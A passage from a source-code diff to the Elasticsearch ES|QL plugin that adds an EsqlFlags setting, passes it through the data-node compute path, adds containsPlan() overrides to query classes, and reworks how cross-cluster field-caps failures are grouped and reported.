(context.configuration().profile()) { - return DriverCompletionInfo.includingProfiles( + ActionListener driverListener = listener.map(ignored -> { + if (LOGGER.isDebugEnabled()) { + LOGGER.debug( + "finished {}", + DriverCompletionInfo.includingProfiles( drivers, context.description(), clusterService.getClusterName().value(), transportService.getLocalNode().getName(), localPlan.toString() - ); - } else { - return DriverCompletionInfo.excludingProfiles(drivers); - } - }), () -> Releasables.close(drivers)) + ) + ); + } + if (context.configuration().profile()) { + return DriverCompletionInfo.includingProfiles( + drivers, + context.description(), + clusterService.getClusterName().value(), + transportService.getLocalNode().getName(), + localPlan.toString() + ); + } else { + return DriverCompletionInfo.excludingProfiles(drivers); + } + }); + driverRunner.executeDrivers( + task, + drivers, + transportService.getThreadPool().executor(ESQL_WORKER_THREAD_POOL_NAME), + ActionListener.releaseAfter(driverListener, () -> Releasables.close(drivers)) ); } catch (Exception e) { listener.onFailure(e); @@ -652,6 +724,10 @@ CancellableTask createGroupTask(Task parentTask, Supplier description) t } } + public EsqlFlags createFlags() { + return new EsqlFlags(clusterService.getClusterSettings()); + } + private static class ComputeGroupTaskRequest extends AbstractTransportRequest { private final Supplier parentDescription; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java index 0de272502e1c7..aea1c7d6d2d67 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeComputeHandler.java @@ -99,6 +99,7 @@ void startComputeOnDataNodes( String sessionId, String clusterAlias, CancellableTask parentTask, + EsqlFlags flags, Configuration configuration, PhysicalPlan dataNodePlan, Set concreteIndices, @@ -116,7 +117,7 @@ void startComputeOnDataNodes( esqlExecutor, parentTask, originalIndices, - PlannerUtils.canMatchFilter(dataNodePlan), + PlannerUtils.canMatchFilter(flags, configuration, clusterService.state().getMinTransportVersion(), dataNodePlan), clusterAlias, configuration.allowPartialResults(), maxConcurrentNodesPerCluster == null ? -1 : maxConcurrentNodesPerCluster, @@ -219,6 +220,7 @@ protected void sendRequest( } private class DataNodeRequestExecutor { + private final EsqlFlags flags; private final DataNodeRequest request; private final CancellableTask parentTask; private final ExchangeSinkHandler exchangeSink; @@ -229,6 +231,7 @@ private class DataNodeRequestExecutor { private final Map shardLevelFailures; DataNodeRequestExecutor( + EsqlFlags flags, DataNodeRequest request, CancellableTask parentTask, ExchangeSinkHandler exchangeSink, @@ -237,6 +240,7 @@ private class DataNodeRequestExecutor { Map shardLevelFailures, ComputeListener computeListener ) { + this.flags = flags; this.request = request; this.parentTask = parentTask; this.exchangeSink = exchangeSink; @@ -297,6 +301,7 @@ public void onFailure(Exception e) { sessionId, "data", clusterAlias, + flags, searchContexts, configuration, configuration.newFoldContext(), @@ -422,7 +427,9 @@ private void runComputeOnDataNode( exchangeService.finishSinkHandler(externalId, new TaskCancelledException(task.getReasonCancelled())); exchangeService.finishSinkHandler(request.sessionId(), new TaskCancelledException(task.getReasonCancelled())); }); + EsqlFlags flags = computeService.createFlags(); DataNodeRequestExecutor dataNodeRequestExecutor = new DataNodeRequestExecutor( + flags, request, task, internalSink, @@ -442,6 +449,7 @@ private void runComputeOnDataNode( request.sessionId(), "node_reduce", request.clusterAlias(), + flags, List.of(), request.configuration(), new FoldContext(request.pragmas().foldLimit().getBytes()), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java index 4409201606d0a..469a3fd0816c1 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/DataNodeRequestSender.java @@ -134,17 +134,20 @@ final void startComputeOnDataNodes(Set concreteIndices, Runnable runOnTa var computeListener = new ComputeListener( transportService.getThreadPool(), runOnTaskFailure, - listener.map( - completionInfo -> new ComputeResponse( + listener.map(completionInfo -> { + final int totalSkipShards = targetShards.skippedShards() + skippedShards.get(); + final int failedShards = shardFailures.size(); + final int successfulShards = targetShards.totalShards() - totalSkipShards - failedShards; + return new ComputeResponse( completionInfo, timeValueNanos(System.nanoTime() - startTimeInNanos), targetShards.totalShards(), - targetShards.totalShards() - shardFailures.size() - skippedShards.get(), - targetShards.skippedShards() + skippedShards.get(), - shardFailures.size(), + successfulShards, + totalSkipShards, + failedShards, selectFailures() - ) - ) + ); + }) ) ) { pendingShardIds.addAll(order(targetShards)); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java new file mode 100644 index 0000000000000..09ef93d56e9ee --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlFlags.java @@ -0,0 +1,34 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.plugin; + +import org.elasticsearch.common.settings.ClusterSettings; +import org.elasticsearch.common.settings.Setting; + +public class EsqlFlags { + public static final Setting ESQL_STRING_LIKE_ON_INDEX = Setting.boolSetting( + "esql.query.string_like_on_index", + true, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + private final boolean stringLikeOnIndex; + + public EsqlFlags(boolean stringLikeOnIndex) { + this.stringLikeOnIndex = stringLikeOnIndex; + } + + public EsqlFlags(ClusterSettings settings) { + this.stringLikeOnIndex = settings.get(ESQL_STRING_LIKE_ON_INDEX); + } + + public boolean stringLikeOnIndex() { + return stringLikeOnIndex; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java index 293a7be6be041..776874fbf90f6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/EsqlPlugin.java @@ -21,10 +21,9 @@ import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BlockFactoryProvider; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneOperator; import org.elasticsearch.compute.lucene.TimeSeriesSourceOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; import org.elasticsearch.compute.operator.AggregationOperator; @@ -33,6 +32,7 @@ import org.elasticsearch.compute.operator.HashAggregationOperator; import org.elasticsearch.compute.operator.LimitOperator; import org.elasticsearch.compute.operator.MvExpandOperator; +import org.elasticsearch.compute.operator.SampleOperator; import org.elasticsearch.compute.operator.exchange.ExchangeService; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.compute.operator.exchange.ExchangeSourceOperator; @@ -72,7 +72,10 @@ import org.elasticsearch.xpack.esql.enrich.LookupFromIndexOperator; import org.elasticsearch.xpack.esql.execution.PlanExecutor; import org.elasticsearch.xpack.esql.expression.ExpressionWritables; +import org.elasticsearch.xpack.esql.io.stream.ExpressionQueryBuilder; +import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder; import org.elasticsearch.xpack.esql.plan.PlanWritables; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.querydsl.query.SingleValueQuery; import org.elasticsearch.xpack.esql.querylog.EsqlQueryLog; import org.elasticsearch.xpack.esql.session.IndexResolver; @@ -158,14 +161,6 @@ public class EsqlPlugin extends Plugin implements ActionPlugin, ExtensiblePlugin Setting.Property.Dynamic ); - public static final Setting DEFAULT_DATA_PARTITIONING = Setting.enumSetting( - DataPartitioning.class, - "esql.default_data_partitioning", - DataPartitioning.AUTO, - Setting.Property.NodeScope, - Setting.Property.Dynamic - ); - /** * Tuning parameter for deciding when to use the "merge" stored field loader. * Think of it as "how similar to a sequential block of documents do I have to @@ -261,8 +256,10 @@ public List> getSettings() { ESQL_QUERYLOG_THRESHOLD_INFO_SETTING, ESQL_QUERYLOG_THRESHOLD_WARN_SETTING, ESQL_QUERYLOG_INCLUDE_USER_SETTING, - DEFAULT_DATA_PARTITIONING, - STORED_FIELDS_SEQUENTIAL_PROPORTION + PhysicalSettings.DEFAULT_DATA_PARTITIONING, + PhysicalSettings.VALUES_LOADING_JUMBO_SIZE, + STORED_FIELDS_SEQUENTIAL_PROPORTION, + EsqlFlags.ESQL_STRING_LIKE_ON_INDEX ); } @@ -320,11 +317,14 @@ public List getNamedWriteables() { entries.add(TimeSeriesSourceOperator.Status.ENTRY); entries.add(TopNOperatorStatus.ENTRY); entries.add(MvExpandOperator.Status.ENTRY); - entries.add(ValuesSourceReaderOperator.Status.ENTRY); + entries.add(ValuesSourceReaderOperatorStatus.ENTRY); entries.add(SingleValueQuery.ENTRY); entries.add(AsyncOperator.Status.ENTRY); entries.add(EnrichLookupOperator.Status.ENTRY); entries.add(LookupFromIndexOperator.Status.ENTRY); + entries.add(SampleOperator.Status.ENTRY); + entries.add(ExpressionQueryBuilder.ENTRY); + entries.add(PlanStreamWrapperQueryBuilder.ENTRY); entries.addAll(ExpressionWritables.getNamedWriteables()); entries.addAll(PlanWritables.getNamedWriteables()); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java index 345bf3b8767ef..bdd0e382c3fd3 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/QueryPragmas.java @@ -22,6 +22,7 @@ import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import java.io.IOException; import java.util.Locale; @@ -45,7 +46,7 @@ public final class QueryPragmas implements Writeable { * the enum {@link DataPartitioning} which has more documentation. Not an * {@link Setting#enumSetting} because those can't have {@code null} defaults. * {@code null} here means "use the default from the cluster setting - * named {@link EsqlPlugin#DEFAULT_DATA_PARTITIONING}." + * named {@link PhysicalSettings#DEFAULT_DATA_PARTITIONING}." */ public static final Setting DATA_PARTITIONING = Setting.simpleString("data_partitioning"); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java index 6629b0b09d086..8d67a747f0e02 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/TransportEsqlQueryAction.java @@ -174,6 +174,7 @@ public TransportEsqlQueryAction( defaultAllowPartialResults = EsqlPlugin.QUERY_ALLOW_PARTIAL_RESULTS.get(clusterService.getSettings()); clusterService.getClusterSettings() .addSettingsUpdateConsumer(EsqlPlugin.QUERY_ALLOW_PARTIAL_RESULTS, v -> defaultAllowPartialResults = v); + } @Override @@ -213,6 +214,7 @@ private void innerExecute(Task task, EsqlQueryRequest request, ActionListener computeService.execute( sessionId, (CancellableTask) task, + flags, plan, configuration, foldCtx, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java index 1db12c873a763..812e741c64d29 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/EqualsSyntheticSourceDelegate.java @@ -35,6 +35,11 @@ protected String innerToString() { return fieldName + "(delegate):" + value; } + @Override + public boolean containsPlan() { + return false; + } + private class Builder extends BaseTermQueryBuilder { private Builder(String name, String value) { super(name, value); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java index aa0e896dfc013..2946af2ac5c23 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KnnQuery.java @@ -81,4 +81,9 @@ public int hashCode() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java index 7ef272f84ec9f..56229ec325d73 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/KqlQuery.java @@ -87,4 +87,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java index be6f244ac4acf..6a10542687490 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchPhraseQuery.java @@ -108,4 +108,9 @@ public Map options() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java index 57489cc930bf2..d3d9d810d78fc 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MatchQuery.java @@ -130,4 +130,9 @@ public Map options() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java index 5526283dfe5a0..0caa22ef92669 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/MultiMatchQuery.java @@ -114,4 +114,9 @@ protected String innerToString() { public boolean scorable() { return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java index 912af6663a9dc..ca1816feba426 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SingleValueQuery.java @@ -125,6 +125,11 @@ public int hashCode() { return Objects.hash(super.hashCode(), next, field, useSyntheticSourceDelegate); } + @Override + public boolean containsPlan() { + return next.containsPlan(); + } + public abstract static class AbstractBuilder extends AbstractQueryBuilder { private final QueryBuilder next; private final String field; @@ -225,6 +230,10 @@ protected final org.apache.lucene.search.Query simple(MappedFieldType ft, Search builder.add(rewrite, BooleanClause.Occur.FILTER); return builder.build(); } + + public String fieldName() { + return field; + } } /** diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java index bf0fa72d3af41..98939b5a495f6 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/SpatialRelatesQuery.java @@ -86,6 +86,11 @@ public ShapeRelation shapeRelation() { }; } + @Override + public boolean containsPlan() { + return false; + } + /** * This class is a minimal implementation of the QueryBuilder interface. * We only need the toQuery method, but ESQL makes extensive use of QueryBuilder and trimming that interface down for ESQL only would diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java index d61101c2f594c..8106f6c6661aa 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/querydsl/query/TranslationAwareExpressionQuery.java @@ -40,4 +40,9 @@ public boolean scorable() { // All Full Text Functions are translated to queries using this method return true; } + + @Override + public boolean containsPlan() { + return false; + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java index 928c7734cf422..0f66a839bb429 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/Configuration.java @@ -211,6 +211,23 @@ public Map> tables() { return tables; } + public Configuration withoutTables() { + return new Configuration( + zoneId, + locale, + username, + clusterName, + pragmas, + resultTruncationMaxSize, + resultTruncationDefaultSize, + query, + profile, + Map.of(), + queryStartTimeNanos, + allowPartialResults + ); + } + /** * Enable profiling, sacrificing performance to return information about * what operations are taking the most time. @@ -309,4 +326,11 @@ public String toString() { + '}'; } + /** + * Reads a {@link Configuration} that doesn't contain any {@link Configuration#tables()}. + */ + public static Configuration readWithoutTables(StreamInput in) throws IOException { + BlockStreamInput blockStreamInput = new BlockStreamInput(in, null); + return new Configuration(blockStreamInput); + } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java index 51cb9b35becb1..8b23e46f90a98 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlCCSUtils.java @@ -15,11 +15,9 @@ import org.elasticsearch.action.search.ShardSearchFailure; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.Strings; -import org.elasticsearch.common.util.set.Sets; import org.elasticsearch.compute.operator.DriverCompletionInfo; import org.elasticsearch.core.Nullable; import org.elasticsearch.index.IndexNotFoundException; -import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.indices.IndicesExpressionGrouper; import org.elasticsearch.license.XPackLicenseState; import org.elasticsearch.transport.ConnectTransportException; @@ -35,27 +33,36 @@ import org.elasticsearch.xpack.esql.plan.IndexPattern; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; +import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; -import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Set; +import java.util.stream.Collectors; public class EsqlCCSUtils { private EsqlCCSUtils() {} - static Map determineUnavailableRemoteClusters(List failures) { - Map unavailableRemotes = new HashMap<>(); + static Map> groupFailuresPerCluster(List failures) { + Map> perCluster = new HashMap<>(); for (FieldCapabilitiesFailure failure : failures) { - if (ExceptionsHelper.isRemoteUnavailableException(failure.getException())) { - for (String indexExpression : failure.getIndices()) { - if (indexExpression.indexOf(RemoteClusterAware.REMOTE_CLUSTER_INDEX_SEPARATOR) > 0) { - unavailableRemotes.put(RemoteClusterAware.parseClusterAlias(indexExpression), failure); - } - } + String cluster = RemoteClusterAware.parseClusterAlias(failure.getIndices()[0]); + perCluster.computeIfAbsent(cluster, k -> new ArrayList<>()).add(failure); + } + return perCluster; + } + + static Map determineUnavailableRemoteClusters(Map> failures) { + Map unavailableRemotes = new HashMap<>(failures.size()); + for (var e : failures.entrySet()) { + if (Strings.isEmpty(e.getKey())) { + continue; + } + if (e.getValue().stream().allMatch(f -> ExceptionsHelper.isRemoteUnavailableException(f.getException()))) { + unavailableRemotes.put(e.getKey(), e.getValue().get(0)); } } return unavailableRemotes; @@ -136,8 +143,8 @@ static void updateExecutionInfoToReturnEmptyResult(EsqlExecutionInfo executionIn } else { builder.setStatus(EsqlExecutionInfo.Cluster.Status.SKIPPED); // add this exception to the failures list only if there is no failure already recorded there - if (v.getFailures() == null || v.getFailures().size() == 0) { - builder.setFailures(List.of(new ShardSearchFailure(exceptionForResponse))); + if (v.getFailures().isEmpty()) { + builder.addFailures(List.of(new ShardSearchFailure(exceptionForResponse))); } } return builder.build(); @@ -169,7 +176,11 @@ static String createIndexExpressionFromAvailableClusters(EsqlExecutionInfo execu } } - static void updateExecutionInfoWithUnavailableClusters(EsqlExecutionInfo execInfo, Map unavailable) { + static void updateExecutionInfoWithUnavailableClusters( + EsqlExecutionInfo execInfo, + Map> failures + ) { + Map unavailable = determineUnavailableRemoteClusters(failures); for (Map.Entry entry : unavailable.entrySet()) { String clusterAlias = entry.getKey(); boolean skipUnavailable = execInfo.getCluster(clusterAlias).isSkipUnavailable(); @@ -188,18 +199,17 @@ static void updateExecutionInfoWithUnavailableClusters(EsqlExecutionInfo execInf static void updateExecutionInfoWithClustersWithNoMatchingIndices( EsqlExecutionInfo executionInfo, IndexResolution indexResolution, - QueryBuilder filter + boolean usedFilter ) { - Set clustersWithResolvedIndices = new HashSet<>(); - // determine missing clusters + // Get the clusters which are still running, and we will check whether they have any matching indices. + // NOTE: we assume that updateExecutionInfoWithUnavailableClusters() was already run and took care of unavailable clusters. + final Set clustersWithNoMatchingIndices = executionInfo.getClusterStates(Cluster.Status.RUNNING) + .map(Cluster::getClusterAlias) + .collect(Collectors.toSet()); for (String indexName : indexResolution.resolvedIndices()) { - clustersWithResolvedIndices.add(RemoteClusterAware.parseClusterAlias(indexName)); + clustersWithNoMatchingIndices.remove(RemoteClusterAware.parseClusterAlias(indexName)); } - Set clustersRequested = executionInfo.clusterAliases(); - Set clustersWithNoMatchingIndices = Sets.difference(clustersRequested, clustersWithResolvedIndices); - clustersWithNoMatchingIndices.removeAll(indexResolution.unavailableClusters().keySet()); - - /** + /* * Rules enforced at planning time around non-matching indices * 1. fail query if no matching indices on any cluster (VerificationException) - that is handled elsewhere * 2. fail query if a cluster has no matching indices *and* a concrete index was specified - handled here @@ -211,25 +221,21 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( * Mark it as SKIPPED with 0 shards searched and took=0. */ for (String c : clustersWithNoMatchingIndices) { - if (executionInfo.getCluster(c).getStatus() != Cluster.Status.RUNNING) { - // if cluster was already in a terminal state, we don't need to check it again - continue; - } final String indexExpression = executionInfo.getCluster(c).getIndexExpression(); if (concreteIndexRequested(executionInfo.getCluster(c).getIndexExpression())) { String error = Strings.format( "Unknown index [%s]", (c.equals(RemoteClusterAware.LOCAL_CLUSTER_GROUP_KEY) ? indexExpression : c + ":" + indexExpression) ); - if (executionInfo.isSkipUnavailable(c) == false) { + if (executionInfo.isSkipUnavailable(c) == false || usedFilter) { if (fatalErrorMessage == null) { fatalErrorMessage = error; } else { fatalErrorMessage += "; " + error; } } - if (filter == null) { - // We check for filter since the filter may be the reason why the index is missing, and then it's ok + if (usedFilter == false) { + // We check for filter since the filter may be the reason why the index is missing, and then we don't want to mark yet markClusterWithFinalStateAndNoShards( executionInfo, c, @@ -238,10 +244,22 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( ); } } else { + // We check for the valid resolution because if we have empty resolution it's still an error. if (indexResolution.isValid()) { - // no matching indices and no concrete index requested - just mark it as done, no error - // We check for the valid resolution because if we have empty resolution it's still an error. - markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SUCCESSFUL, null); + List failures = indexResolution.failures().getOrDefault(c, List.of()); + // No matching indices, no concrete index requested, and no error in field-caps; just mark as done. + if (failures.isEmpty()) { + markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SUCCESSFUL, null); + } else { + // skip reporting index_not_found exceptions to avoid spamming users with such errors + // when queries use a remote cluster wildcard, e.g., `*:my-logs*`. + Exception nonIndexNotFound = failures.stream() + .map(FieldCapabilitiesFailure::getException) + .filter(ex -> ExceptionsHelper.unwrap(ex, IndexNotFoundException.class) == null) + .findAny() + .orElse(null); + markClusterWithFinalStateAndNoShards(executionInfo, c, Cluster.Status.SKIPPED, nonIndexNotFound); + } } } } @@ -252,7 +270,7 @@ static void updateExecutionInfoWithClustersWithNoMatchingIndices( // Filter-less version, mainly for testing where we don't need filter support static void updateExecutionInfoWithClustersWithNoMatchingIndices(EsqlExecutionInfo executionInfo, IndexResolution indexResolution) { - updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution, null); + updateExecutionInfoWithClustersWithNoMatchingIndices(executionInfo, indexResolution, false); } // visible for testing @@ -360,7 +378,7 @@ public static void markClusterWithFinalStateAndNoShards( .setSkippedShards(Objects.requireNonNullElse(v.getSkippedShards(), 0)) .setFailedShards(Objects.requireNonNullElse(v.getFailedShards(), 0)); if (ex != null) { - builder.setFailures(List.of(new ShardSearchFailure(ex))); + builder.addFailures(List.of(new ShardSearchFailure(ex))); } return builder.build(); }); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java index 4ff65f59bbd72..9e5b88484f857 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/session/EsqlSession.java @@ -7,8 +7,12 @@ package org.elasticsearch.xpack.esql.session; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; +import org.elasticsearch.action.fieldcaps.FieldCapabilitiesFailure; +import org.elasticsearch.action.search.ShardSearchFailure; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.common.Strings; @@ -19,15 +23,19 @@ import org.elasticsearch.compute.data.BlockUtils; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.operator.DriverCompletionInfo; +import org.elasticsearch.compute.operator.FailureCollector; +import org.elasticsearch.core.CheckedFunction; import org.elasticsearch.core.Releasables; import org.elasticsearch.index.IndexMode; import org.elasticsearch.index.mapper.IndexModeFieldMapper; import org.elasticsearch.index.query.BoolQueryBuilder; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.TermQueryBuilder; +import org.elasticsearch.index.shard.ShardId; import org.elasticsearch.indices.IndicesExpressionGrouper; import org.elasticsearch.logging.LogManager; import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.SearchShardTarget; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.EsqlExecutionInfo; import org.elasticsearch.xpack.esql.action.EsqlQueryRequest; @@ -108,7 +116,6 @@ import java.util.List; import java.util.Map; import java.util.Set; -import java.util.function.Function; import java.util.stream.Collectors; import static org.elasticsearch.index.query.QueryBuilders.boolQuery; @@ -326,11 +333,58 @@ private LocalRelation resultToPlan(LogicalPlan plan, Result result) { } private LogicalPlan parse(String query, QueryParams params) { - var parsed = new EsqlParser().createStatement(query, params, planTelemetry); + var parsed = new EsqlParser().createStatement(query, params, planTelemetry, configuration); LOGGER.debug("Parsed logical plan:\n{}", parsed); return parsed; } + /** + * Associates errors that occurred during field-caps with the cluster info in the execution info. + * - Skips clusters that are no longer running, as they have already been marked as successful, skipped, or failed. + * - If allow_partial_results or skip_unavailable is enabled, stores the failures in the cluster info but allows execution to continue. + * - Otherwise, aborts execution with the failures. + */ + static void handleFieldCapsFailures( + boolean allowPartialResults, + EsqlExecutionInfo executionInfo, + Map> failures + ) throws Exception { + FailureCollector failureCollector = new FailureCollector(); + for (var e : failures.entrySet()) { + String clusterAlias = e.getKey(); + EsqlExecutionInfo.Cluster cluster = executionInfo.getCluster(clusterAlias); + if (cluster.getStatus() != EsqlExecutionInfo.Cluster.Status.RUNNING) { + assert cluster.getStatus() != 